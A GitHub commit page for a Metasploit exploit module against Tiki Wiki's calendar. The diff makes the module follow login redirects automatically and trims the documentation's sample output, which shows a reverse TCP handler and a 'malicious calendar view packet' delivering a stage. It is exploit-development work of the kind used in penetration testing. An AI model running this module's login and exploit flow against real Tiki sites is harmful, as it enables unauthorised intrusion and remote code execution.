Skip to content

Commit 6fe7698

Browse files
author
h00die
committed
follow redirect automatically
1 parent 3f25c27 commit 6fe7698

File tree

2 files changed

+6
-17
lines changed

2 files changed

+6
-17
lines changed

documentation/modules/exploit/linux/http/tiki_calendar_exec.md

Lines changed: 0 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -35,7 +35,6 @@
3535
8. Do: `check`
3636
```
3737
[*] Attempting Login
38-
[*] Verifying login... Visiting redirect to: http://10.10.10.10/t14_1/tiki-wizard_admin.php?&stepNr=0&url=http%3A%2F%2F192.168.2.190%2Ft14_1%2Ftiki-index.php
3938
[+] Login Successful!
4039
[+] 10.10.10.10:80 The target is vulnerable.
4140
```
@@ -44,7 +43,6 @@
4443
```
4544
[*] Started reverse TCP handler on 10.10.10.10:4444
4645
[*] Attempting Login
47-
[*] Verifying login... Visiting redirect to: http://10.10.10.10/t14_1/tiki-wizard_admin.php?&stepNr=0&url=http%3A%2F%2F192.168.2.190%2Ft14_1%2Ftiki-index.php
4846
[+] Login Successful!
4947
[*] Sending malicious calendar view packet
5048
[*] Sending stage (33721 bytes) 10.10.10.10.190

modules/exploits/linux/http/tiki_calendar_exec.rb

Lines changed: 6 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -67,7 +67,8 @@ def authenticate
6767
cookie = res ? res.get_cookies : ''
6868
# if we have creds, login with them
6969
vprint_status('Attempting Login')
70-
res = send_request_cgi(
70+
# the bang on the cgi will follow the redirect we receive on a good login
71+
res = send_request_cgi!(
7172
'uri' => normalize_uri(target_uri.path, 'tiki-login.php'),
7273
'method' => 'POST',
7374
'ctype' => 'application/x-www-form-urlencoded',
@@ -81,21 +82,11 @@ def authenticate
8182
'stay_in_ssl_mode' => 'n'
8283
}
8384
)
84-
if res && res.redirect? && res.redirection.to_s.end_with?('tiki-login_scr.php')
85+
# double check auth worked and we got a Log out on the page.
86+
# at times I got it to auth, but then it would give permission errors
87+
# so we want to try to double check everything is good
88+
unless res.body =~ /Log out/
8589
fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
86-
elsif res && res.redirect?
87-
vprint_status("Verifying login... Visiting redirect to: #{res.redirection}")
88-
res = send_request_cgi(
89-
'uri' => res.redirection.to_s,
90-
'method' => 'GET',
91-
'cookie' => cookie
92-
)
93-
# double check auth worked and we got a Log out on the page.
94-
# at times I got it to auth, but then it would give permission errors
95-
# so we want to try to double check everything is good
96-
unless res.body =~ /Log out/
97-
fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
98-
end
9990
end
10091
vprint_good("Login Successful!")
10192
return cookie

0 commit comments

Comments
 (0)